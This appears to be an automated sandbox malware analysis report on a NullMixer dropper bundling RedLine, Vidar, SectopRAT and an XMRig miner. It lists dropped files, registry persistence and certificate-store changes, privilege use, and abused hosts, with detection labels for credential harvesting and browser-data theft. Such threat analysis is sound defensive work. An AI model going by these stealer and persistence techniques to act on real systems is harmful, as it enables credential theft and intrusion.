Malware Analysis Report

2025-01-02 06:06

Sample ID 241125-ljerxawmgp
Target 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118
SHA256 befd232ab8dab62c010a0a96e0e62a1ff561509877fd8acfa1507df11e092aec
Tags
nullmixer privateloader redline sectoprat socelars vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

befd232ab8dab62c010a0a96e0e62a1ff561509877fd8acfa1507df11e092aec

Threat Level: Known bad

The file 9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

nullmixer privateloader redline sectoprat socelars vidar build1 aspackv2 discovery dropper execution infostealer loader persistence rat spyware stealer trojan xmrig miner

Privateloader family

Nullmixer family

SectopRAT

Socelars payload

PrivateLoader

Vidar

Redline family

Sectoprat family

NullMixer

SectopRAT payload

RedLine

Vidar family

Socelars

Socelars family

RedLine payload

xmrig

Xmrig family

Vidar Stealer

XMRig Miner payload

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

ASPack v2.12-2.42

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Looks up external IP address via web service

Looks up geolocation information via web service

Checks installed software on the system

Accesses 2FA software files, possible credential harvesting

Adds Run key to start application

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Program crash

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Unsigned PE

Browser Information Discovery

Checks processor information in registry

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Scheduled Task/Job: Scheduled Task

Modifies system certificate store

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Analysis: static1

Detonation Overview

Reported

2024-11-25 09:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-25 09:33

Reported

2024-11-25 09:36

Platform

win7-20240903-en

Max time kernel

60s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe"

Signatures

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

Vidar family

vidar

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\53516815d3135fe3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\winnetdriv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A

Reads user/profile data of web browsers

spyware stealer

Accesses 2FA software files, possible credential harvesting

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e1.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.db-ip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2644 set thread context of 1704 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\f34b9ab9db6d16.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\453c5fa76a849.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\08240101651be7e010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\1710990cbc64.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{75BD1881-AB10-11EF-9982-5A85C185DB3E} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\e4b2f18fb52218.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\9aa6e16872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\4f5baa1083db067.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCF8E9096\c862a054a35.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2536 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\9aab74021fae67b0ec355bbc9138b1c4_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
